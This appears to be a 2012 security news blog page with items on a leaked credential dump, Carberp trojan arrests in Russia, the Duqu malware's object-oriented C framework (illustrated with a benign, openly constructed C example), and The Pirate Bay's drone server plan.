           Thirty record sets that include names, user IDs, physical addresses, email addresses, telephone numbers, and clear-text passwords were published in a Pastebin document. “Old crappy server, but has good info inside it. The list is not complete due the lazy condition and msaccess db , enjoy!” the hacker wrote next to the data dump.

           The Pastebin post doesn’t contain the name of the site from where the data was leaked, but the hacker provided us with the IP address associated with it. That IP address led us to a Software Engineering Services site on which only “eligible users” may register.

           We couldn’t reach the hacker for further comment, but he told us on a different occasion that the names of such sites would not be disclosed to the public to prevent “script kiddiez” from breaching them.
We have sent an email to the webmaster of the site in question and notified him of the incident, but so far we haven’t received any response.

           Black Jester is known in the hacker community as the one who wanted to help the United Nations patch up a couple of its public websites. Instead of doing what most security researchers do in this situation and sending an email, he went down to their offices in person.

           His other hacks, which he claims are unrelated to the UN incident, targeted NASA and a Qwest datacenter, whose servers he held hostage with the purpose of forcing the company to patch up the vulnerabilities.

Carberp Banking Trojan Scam - 8 Arrested in Russia

     Eight men suspected of being involved in the Carberp phishing scam have been arrested in Russia. The men were arrested after a joint investigation by the Russian Ministry of Internal Affairs (MVD) and Federal Security Service (FSB).

    According to the MVD, the investigation found that two brothers were the ringleaders of the gang, and developed a plan to steal money from the accounts of online banking customers. The eight suspects allegedly stole more than 60 million Rubles ($2 million) from 90 victims using the Carberp Trojan.

     A Russian security firm that assisted with the investigation pegged the stolen loot at 130 million Rubles ($4.5 million). Police confiscated computers, bank cards, notary equipment, fake documentation, and more than 7 million Rubles ($240,000) in cash during the raid.

     The gang used the Carberp and RDP-door Trojans to snare victims. Carberp is a well-known Trojan that was recently seen on Facebook as part of a scam where attackers notify Facebook users that their accounts are temporarily locked. All they had to do to get them back was provide their first and last names, email addresses, dates of birth, passwords, and a 20-euro Ukash voucher.

     The suspects will be accused of creating, using and disseminating harmful computer programs, theft, and illegal access to computer information and, if convicted, could be jailed for up to 10 years. In addition to bank fraud, the gang was also involved in distributed denial-of-service attacks, the security firm found.

Thursday, March 22, 2012

Mystery of Duqu Programming Language Solved

       An appeal for help from the programming community has allowed antivirus analysts to classify the unknown language used to develop key components of the Duqu Trojan. The sections responsible for downloading and executing additional modules in the Duqu Trojan, referred to by some as Stuxnet 2.0, were written in standard C++.
 
          Kaspersky Lab experts now say with a high degree of certainty that the Duqu framework was written using a custom object-oriented extension to C, generally called “OO C” and compiled with Microsoft Visual Studio Compiler 2008 (MSVC 2008) with special options for optimizing code size and inline expansion.

       Kaspersky’s Igor Soumenkov wrote: “No matter which of these two variants is true, the implications are impressive. The Payload DLL contains 95 Kbytes of event-driven code written with OO C, a language that has no automatic memory management or safe pointers.”

Kaspersky’s analysis now concludes:
  • The Duqu Framework consists of “C” code compiled with MSVC 2008 using the special options “/O1” and “/Ob1”
  • The code was most likely written with a custom extension to C, generally called “OO C”
  • The event-driven architecture was developed as a part of the Duqu Framework or its OO C extension
  • The C&C code could have been reused from an already existing software project and integrated into the Duqu Trojan
      The Duqu Framework may have been created by a different programming team, since it is unique to Duqu, unlike many parts of Duqu that seem to be directly borrowed from Stuxnet. It’s believed that the developers are old-school programmers who don’t trust C++, and that’s probably why they relied on C. Another reason for using OO C is that back in the good old days it was more portable than C++.
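To make concrete what the analysts mean by “OO C” and by event-driven code with no automatic memory management, here is an added illustration in plain C. It is a constructed example written for this page, not code recovered from Duqu or taken from Kaspersky’s analysis, and every name in it (handler, sum_handler, run_event_loop, the event kinds) is hypothetical. It shows the three hallmarks of the style: a struct whose first member points to a table of function pointers (a vtable), a constructor and destructor that allocate and free by hand, and a small event loop that dispatches each event through the table.

```c
/* Constructed example of object-oriented C (not Duqu code).
 * A "class" is a struct whose first member is a vtable pointer;
 * a "derived class" embeds the base struct as its first member so a
 * base pointer can alias it. All names here are hypothetical. */
#include <stdio.h>
#include <stdlib.h>

/* Event kinds carried by the queue. */
typedef enum { EV_DATA = 1, EV_SHUTDOWN = 2 } event_kind;

typedef struct event {
    event_kind kind;
    int payload;
} event;

typedef struct handler handler;

/* The vtable: one function pointer per "virtual method". */
typedef struct handler_vtbl {
    int  (*on_event)(handler *self, const event *ev);
    void (*destroy)(handler *self);
} handler_vtbl;

/* Base "class": vtable pointer first, then instance fields. */
struct handler {
    const handler_vtbl *vt;
    int handled;            /* events this handler consumed */
};

/* Derived "class": base embedded first, then its own fields. */
typedef struct sum_handler {
    handler base;
    long total;             /* running sum of EV_DATA payloads */
} sum_handler;

static int sum_on_event(handler *self, const event *ev) {
    sum_handler *sh = (sum_handler *)self;   /* downcast via first member */
    if (ev->kind != EV_DATA) return 0;
    sh->total += ev->payload;
    self->handled++;
    return 1;
}

/* "Destructor": nothing frees this object unless the code does. */
static void sum_destroy(handler *self) {
    free(self);
}

static const handler_vtbl sum_vtbl = { sum_on_event, sum_destroy };

/* "Constructor": allocate the object and wire its vtable. NULL on OOM. */
handler *sum_handler_new(void) {
    sum_handler *sh = calloc(1, sizeof *sh);
    if (!sh) return NULL;
    sh->base.vt = &sum_vtbl;
    return &sh->base;
}

long sum_handler_total(const handler *h) {
    return ((const sum_handler *)h)->total;
}

/* Event loop: dispatch through the vtable until EV_SHUTDOWN.
 * Returns the number of events the handler consumed. */
int run_event_loop(handler *h, const event *queue, size_t n) {
    for (size_t i = 0; i < n; i++) {
        if (queue[i].kind == EV_SHUTDOWN) break;
        h->vt->on_event(h, &queue[i]);
    }
    return h->handled;
}

/* Driver over a constructed queue: two data events, a shutdown, and one
 * event after the shutdown that must never be processed.
 * Returns the summed payload (12) when exactly two events were handled. */
long demo(void) {
    const event queue[] = {
        { EV_DATA, 5 }, { EV_DATA, 7 }, { EV_SHUTDOWN, 0 }, { EV_DATA, 100 }
    };
    handler *h = sum_handler_new();
    if (!h) return -1;
    int handled = run_event_loop(h, queue, sizeof queue / sizeof queue[0]);
    long total = sum_handler_total(h);
    printf("handled=%d total=%ld\n", handled, total);
    h->vt->destroy(h);                         /* manual cleanup */
    return handled == 2 ? total : -1;
}

int main(void) { return demo() == 12 ? 0 : 1; }
```

Compiled, code in this style contains no C++ name-mangled symbols or RTTI, only indirect calls through tables of function pointers and hand-written allocate/free pairs, which is part of why classifying the language from the binary alone was difficult and why the analysts flagged the absence of safe pointers as a risk for code of this size.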

           Knowing the techniques used to develop the malware allows Kaspersky's researchers to make better guesses about who might be behind the code. Creating Duqu was a major project, so it’s possible that an entirely different team was responsible for creating the Duqu Framework, while others worked on creating drivers and system infection exploits. In this scenario it's even possible that those who created the Duqu framework were ignorant of the real purpose of their work.

          Duqu was first detected in September 2011, but Kaspersky Lab believes it has seen the first pieces of Duqu-related malware dating back to August 2007. The Russian security firm also notes Duqu, like Stuxnet before it, is highly targeted and related to Iran’s nuclear program.

The Pirate Bay plans Low Orbit Server Drones to beat Censorship

          One of the world’s largest BitTorrent sites “The Pirate Bay” is going to put servers on GPS-controlled aircraft drones in order to evade authorities who are looking to shut the site down. In a Sunday blog post, The Pirate Bay announced new “Low Orbit Server Stations” that will house the site’s servers and files on unmanned, GPS-controlled, aircraft drones.

TPB said:
          With the development of GPS controlled drones, far-reaching cheap radio equipment and tiny new computers like the Raspberry Pi, we’re going to experiment with sending out some small drones that will float some kilometers up in the air. This way our machines will have to be shut down with aeroplanes in order to shut down the system. A real act of war.
 
          We’re just starting so we haven’t figured everything out yet. But we can’t limit ourselves to hosting things just on land anymore. These Low Orbit Server Stations (LOSS) are just the first attempt. With modern radio transmitters we can get over 100Mbps per node up to 50km away. For the proxy system we’re building, that’s more than enough.

          Low earth orbit is 100 miles up and requires a launch vehicle capable of achieving speeds of 17,000 miles an hour. At “some kilometers up in the air,” these drones would require significant power to stay afloat, and that’s even before the power required to transmit megabits per second over a wireless connection. The LOSS are already in development, writes the blog from TPB.
 
          Even if you want to solve the energy problem, it has not been thought through well, and that will probably be the weak point. Drones cannot recharge while in the air, at least not yet; they would have to land somewhere to be charged, and at that point the authorities could reach them and switch them off easily.